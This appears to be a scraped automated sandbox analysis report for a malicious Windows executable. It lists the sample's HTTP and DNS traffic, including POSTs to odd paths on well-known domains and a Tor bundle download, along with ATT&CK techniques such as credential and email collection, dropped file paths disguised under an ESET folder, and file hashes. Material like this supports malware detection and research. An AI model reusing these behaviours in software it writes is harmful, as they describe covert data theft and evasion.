set-cookie: guest_id=v1%3A168547933387089532; Max-Age=34214400; Expires=Sat, 29 Jun 2024 20:42:13 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
content-type: text/plain; charset=utf-8
x-powered-by: Express
cache-control: no-cache, no-store, max-age=0
content-length: 38
x-transaction-id: 24fd997d4cdc057a
strict-transport-security: max-age=631138519
x-response-time: 121
x-connection-hash: 52de1709fc42a2404092e39a3937678ac589ba669d1f9e82674802e17001bfd4
GET

https://twitter.com/0My2dPrz2a?s=27

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

104.244.42.65:443

Request

GET /0My2dPrz2a?s=27 HTTP/1.1
Host: twitter.com

Response

HTTP/1.1 302 Found

date: Tue, 30 May 2023 20:42:13 GMT
perf: 7626143928
vary: Accept
server: tsa_o
location: /0My2dPrz2a?s=27
set-cookie: guest_id=v1%3A168547933398886390; Max-Age=34214400; Expires=Sat, 29 Jun 2024 20:42:13 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
content-type: text/plain; charset=utf-8
x-powered-by: Express
cache-control: no-cache, no-store, max-age=0
content-length: 38
x-transaction-id: 0203504524b9edf1
strict-transport-security: max-age=631138519
x-response-time: 111
x-connection-hash: 52de1709fc42a2404092e39a3937678ac589ba669d1f9e82674802e17001bfd4
GET

https://www.cybereason.com/oQJb3GUymA?s=13

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

45.60.66.106:443

Request

GET /oQJb3GUymA?s=13 HTTP/1.1
Host: www.cybereason.com
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Tue, 30 May 2023 20:42:14 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 7cf9cd6c9c9cb71f-AMS
CF-Cache-Status: EXPIRED
Cache-Control: s-maxage=5,max-age=5
Strict-Transport-Security: max-age=31536000; includeSubDomains
Vary: origin, Accept-Encoding
Access-Control-Allow-Credentials: false
Content-Security-Policy: upgrade-insecure-requests
x-envoy-upstream-service-time: 136
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-served-by-pod: iad02/cms-bots-td/envoy-proxy-547bf9f566-fnpk2
x-evy-trace-virtual-host: all
X-Frame-Options: deny
X-Hs-Https-Only: worker
X-HS-Reason: No view mapper found to handle request
X-HubSpot-Correlation-Id: 170e488a-22e4-4787-b372-5a0d1300fa37
X-HubSpot-NotFound: true
x-request-id: 52771928-f6f5-40af-b42b-a4f7938c7dbb
X-Trace: 2BAA80DCA4FFF96F68C6EC85E2F1703438564C62A6000000000000000000
Set-Cookie: __cf_bm=AozdVyxuqDMIPmyT4IfCLXMMVFXyP_njsoamELMs1Qc-1685479334-0-AWzl+jhWwYa1j+ocL8TIrlUT+fz2NmPTygE7wo9jhhr/vvVb9YGLJHHWwF6kDG+avBinds0QtkQkvyfMzl5WfhU=; path=/; expires=Tue, 30-May-23 21:12:14 GMT; domain=.www.cybereason.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LNLQpf44SuavQx01KFaMdmTbcLfKKU2YHPYTxq%2FFmHnSwORO2h3n23bWaHLkjdfytg6zj8SI7sQrGL9Z0K5SJgzCjMpprJvYfhdeeQCWco44S0zdzs8UAARw4Q5T4qM3cio0ZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Set-Cookie: __cfruid=2f6ee084002b888300d409f76e75606aff6bfd7e-1685479334; path=/; domain=.www.cybereason.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
alt-svc: h3=":443"; ma=86400
Set-Cookie: visid_incap_2710048=MaQO385oRT+8OostvratMaVfdmQAAAAAQUIPAAAAAACKQBE6VPGKFwAHkrIDGHMV; expires=Tue, 28 May 2024 22:36:45 GMT; HttpOnly; path=/; Domain=.cybereason.com
Set-Cookie: nlbi_2710048=/RxxLq+4TjLT8BM42P/mMAAAAAD35fsN39LDzfMIjgCg2rHC; path=/; Domain=.cybereason.com
Set-Cookie: incap_ses_451_2710048=2OquEL3WdXEy78hyDkdCBqVfdmQAAAAAuhOFfGwQ9C+im00VCFg0YA==; path=/; Domain=.cybereason.com
X-CDN: Imperva
X-Iinfo: 9-29743207-29743326 NNNN CT(1 11 0) RT(1685479332299 994) q(0 0 1 -1) r(4 4) U11
GET

https://www.cybereason.com/f7XILP3iv4?s=144

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

45.60.66.106:443

Request

GET /f7XILP3iv4?s=144 HTTP/1.1
Host: www.cybereason.com
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Tue, 30 May 2023 20:42:14 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 7cf9cd6b5c2f1c89-AMS
CF-Cache-Status: MISS
Cache-Control: s-maxage=5,max-age=5
Strict-Transport-Security: max-age=31536000; includeSubDomains
Vary: origin, Accept-Encoding
Access-Control-Allow-Credentials: false
Content-Security-Policy: upgrade-insecure-requests
x-envoy-upstream-service-time: 153
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-served-by-pod: iad02/cms-bots-td/envoy-proxy-547bf9f566-mv4cd
x-evy-trace-virtual-host: all
X-Frame-Options: deny
X-Hs-Https-Only: worker
X-HS-Reason: No view mapper found to handle request
X-HubSpot-Correlation-Id: 242d9e6f-c796-4285-a515-8687bcb9594f
X-HubSpot-NotFound: true
x-request-id: 437ef976-b155-4e5e-9863-356f4e87aac6
X-Trace: 2BF4AE8E44DAE52D2C21E87D6D7328A2D18F46DBC8000000000000000000
Set-Cookie: __cf_bm=T1CVztXnzP4EnJL5l3.iHI0ACLjYYpU.rIvtgoUwtIY-1685479334-0-Af1tji+1WIgWfaX4rZQ6ESnA3epgNQswWkyhFlJ7OIpapk1mE5AhZxFDSgvDBAApZKOKKa1VNTfM9MzIRRzUY1I=; path=/; expires=Tue, 30-May-23 21:12:14 GMT; domain=.www.cybereason.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0CD2ZZ%2FudnQ9YWd4PdC33kPH2JmLdYiUHj1GVSj4IFaMitWMvH4NUnBrWCSSDmw61oq%2FzlzT6m9rQOcSz1hWLUhQwZ5OJ9HUHRESOiCD4zhcpYcmVi6yn5%2BfLxClg09rlZzSaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Set-Cookie: __cfruid=2f6ee084002b888300d409f76e75606aff6bfd7e-1685479334; path=/; domain=.www.cybereason.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
alt-svc: h3=":443"; ma=86400
Set-Cookie: visid_incap_2710048=sUr6ZqoPReS1P43tvWA8kqVfdmQAAAAAQUIPAAAAAADSct6ziHom/7vBU73tc2dM; expires=Tue, 28 May 2024 22:36:45 GMT; HttpOnly; path=/; Domain=.cybereason.com
Set-Cookie: nlbi_2710048=/hCcZ1YKgT2ITAZn2P/mMAAAAADrfdVbLi99NtAWOd6oQuLE; path=/; Domain=.cybereason.com
Set-Cookie: incap_ses_451_2710048=fi4pbv/4o2p178hyDkdCBqVfdmQAAAAAsyMbrq/KuyuuDg7mimsWqQ==; path=/; Domain=.cybereason.com
X-CDN: Imperva
X-Iinfo: 2-17135249-17135303 NNNN CT(2 9 0) RT(1685479332356 740) q(0 0 1 -1) r(8 8) U11
DNS

106.66.60.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

106.66.60.45.in-addr.arpa

IN PTR

Response

104.244.42.65:80

twitter.com

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

98 B
52 B
2
1
52.242.101.226:443

104 B
2
45.60.107.106:80

http://cybereason.com/f7XILP3iv4?s=144

http

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

310 B
338 B
5
5

HTTP Request

GET http://cybereason.com/f7XILP3iv4?s=144

HTTP Response

301
45.60.107.106:80

http://cybereason.com/oQJb3GUymA?s=13

http

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

309 B
337 B
5
5

HTTP Request

GET http://cybereason.com/oQJb3GUymA?s=13

HTTP Response

301
142.251.39.110:80

http://youtube.kz/G4XvFNPg1L?27=1

http

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

461 B
8.2kB
7
9

HTTP Request

POST http://youtube.kz/G4XvFNPg1L?27=1

HTTP Response

400
142.251.39.110:80

http://youtube.kz/G4XvFNPg1L?27=1

http

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

507 B
8.3kB
8
10

HTTP Request

POST http://youtube.kz/G4XvFNPg1L?27=1

HTTP Response

400
142.250.179.132:80

http://google.kz/CNhPDG057N?s=89

http

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

258 B
1.9kB
4
4

HTTP Request

GET http://google.kz/CNhPDG057N?s=89

HTTP Response

404
159.69.63.226:443

https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz

tls, http

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

15.8kB
892.6kB
334
649

HTTP Request

GET https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz

HTTP Response

200
104.244.42.65:80

http://twitter.com/0My2dPrz2a?s=27

http

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

668 B
1.0kB
7
7

HTTP Request

POST http://twitter.com/AVHwxwUtwJ?185=0

HTTP Response

301

HTTP Request

GET http://twitter.com/0My2dPrz2a?s=27

HTTP Response

301
45.60.107.106:80

http://cybereason.com/de2GhgMoGn?s=144

http

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

286 B
338 B
5
5

HTTP Request

GET http://cybereason.com/de2GhgMoGn?s=144

HTTP Response

301
104.244.42.65:80

http://twitter.com/0My2dPrz2a?s=27

http

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

374 B
929 B
6
5

HTTP Request

GET http://twitter.com/0My2dPrz2a?s=27

HTTP Response

301

HTTP Request

GET http://twitter.com/0My2dPrz2a?s=27

HTTP Response

301
104.244.42.65:443

https://twitter.com/AVHwxwUtwJ?185=0

tls, http

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

1.0kB
5.4kB
11
11

HTTP Request

GET https://twitter.com/AVHwxwUtwJ?185=0

HTTP Response

302

HTTP Request

GET https://twitter.com/0My2dPrz2a?s=27

HTTP Request

GET https://twitter.com/AVHwxwUtwJ?185=0

HTTP Response

302

HTTP Response

302
45.60.66.106:80

http://www.cybereason.com/f7XILP3iv4?s=144

http

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

268 B
1.7kB
4
4

HTTP Request

GET http://www.cybereason.com/f7XILP3iv4?s=144

HTTP Response

301
45.60.66.106:80

http://www.cybereason.com/de2GhgMoGn?s=144

http

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

413 B
3.3kB
6
7

HTTP Request

GET http://www.cybereason.com/oQJb3GUymA?s=13

HTTP Response

301

HTTP Request

GET http://www.cybereason.com/de2GhgMoGn?s=144

HTTP Response

301
104.244.42.65:443

https://twitter.com/0My2dPrz2a?s=27

tls, http

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

1.3kB
6.9kB
15
15

HTTP Request

GET https://twitter.com/0My2dPrz2a?s=27

HTTP Response

302

HTTP Request

GET https://twitter.com/0My2dPrz2a?s=27

HTTP Request

GET https://twitter.com/0My2dPrz2a?s=27

HTTP Response

302

HTTP Response

302

HTTP Request

GET https://twitter.com/0My2dPrz2a?s=27

HTTP Request

GET https://twitter.com/0My2dPrz2a?s=27

HTTP Response

302

HTTP Response

302
45.60.66.106:443

https://www.cybereason.com/oQJb3GUymA?s=13

tls, http

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

2.1kB
79.9kB
37
68

HTTP Request

GET https://www.cybereason.com/oQJb3GUymA?s=13

HTTP Response

404
45.60.66.106:443

https://www.cybereason.com/f7XILP3iv4?s=144

tls, http

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

2.1kB
79.9kB
37
68

HTTP Request

GET https://www.cybereason.com/f7XILP3iv4?s=144

HTTP Response

404

8.8.8.8:53

twitter.com

dns

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

57 B
121 B
1
1

DNS Request

twitter.com

DNS Response

104.244.42.65

104.244.42.193

104.244.42.1

104.244.42.129
8.8.8.8:53

28.118.140.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

28.118.140.52.in-addr.arpa
8.8.8.8:53

cybereason.com

dns

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

60 B
92 B
1
1

DNS Request

cybereason.com

DNS Response

45.60.107.106

45.60.62.106
8.8.8.8:53

archive.torproject.org

dns

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

68 B
109 B
1
1

DNS Request

archive.torproject.org

DNS Response

159.69.63.226
8.8.8.8:53

youtube.kz

dns

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

56 B
72 B
1
1

DNS Request

youtube.kz

DNS Response

142.251.39.110
8.8.8.8:53

google.kz

dns

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

55 B
71 B
1
1

DNS Request

google.kz

DNS Response

142.250.179.132
8.8.8.8:53

www.cybereason.com

dns

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

64 B
116 B
1
1

DNS Request

www.cybereason.com

DNS Response

45.60.66.106
8.8.8.8:53

23.159.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

23.159.190.20.in-addr.arpa
8.8.8.8:53

110.39.251.142.in-addr.arpa

dns

73 B
112 B
1
1

DNS Request

110.39.251.142.in-addr.arpa
8.8.8.8:53

132.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

132.179.250.142.in-addr.arpa
8.8.8.8:53

106.107.60.45.in-addr.arpa

dns

72 B
126 B
1
1

DNS Request

106.107.60.45.in-addr.arpa
8.8.8.8:53

65.42.244.104.in-addr.arpa

dns

72 B
72 B
1
1

DNS Request

65.42.244.104.in-addr.arpa
8.8.8.8:53

226.63.69.159.in-addr.arpa

dns

72 B
111 B
1
1

DNS Request

226.63.69.159.in-addr.arpa
8.8.8.8:53

106.66.60.45.in-addr.arpa

dns

71 B
125 B
1
1

DNS Request

106.66.60.45.in-addr.arpa

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\EsetSecurity\f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Filesize
490KB

MD5
a338043c6b5260df6b7ce4c4ec3d1b80

SHA1
087a787a34ee05478bfa07b50fd39c8367b0a157

SHA256
f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50

SHA512
c81b2f1aac6d249d43b485e8e536c22a8f44da09e31f118f9ddfd0f1ef6d1eba4b67e96d087b2148f45dc93e0de5ba0178c422088e110a40544a7b3b2ff4fccf

Download Submit
C:\Users\Admin\AppData\Local\EsetSecurity\f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Filesize
490KB

MD5
a338043c6b5260df6b7ce4c4ec3d1b80

SHA1
087a787a34ee05478bfa07b50fd39c8367b0a157

SHA256
f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50

SHA512
c81b2f1aac6d249d43b485e8e536c22a8f44da09e31f118f9ddfd0f1ef6d1eba4b67e96d087b2148f45dc93e0de5ba0178c422088e110a40544a7b3b2ff4fccf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe.log

Filesize
847B

MD5
3308a84a40841fab7dfec198b3c31af7

SHA1
4e7ab6336c0538be5dd7da529c0265b3b6523083

SHA256
169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e

SHA512
97521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198

Download Submit
memory/112-143-0x000001E96D630000-0x000001E96D640000-memory.dmp

Filesize
64KB

Download
memory/372-133-0x000002C82CFB0000-0x000002C82D030000-memory.dmp

Filesize
512KB

Download
memory/372-134-0x000002C847710000-0x000002C847720000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads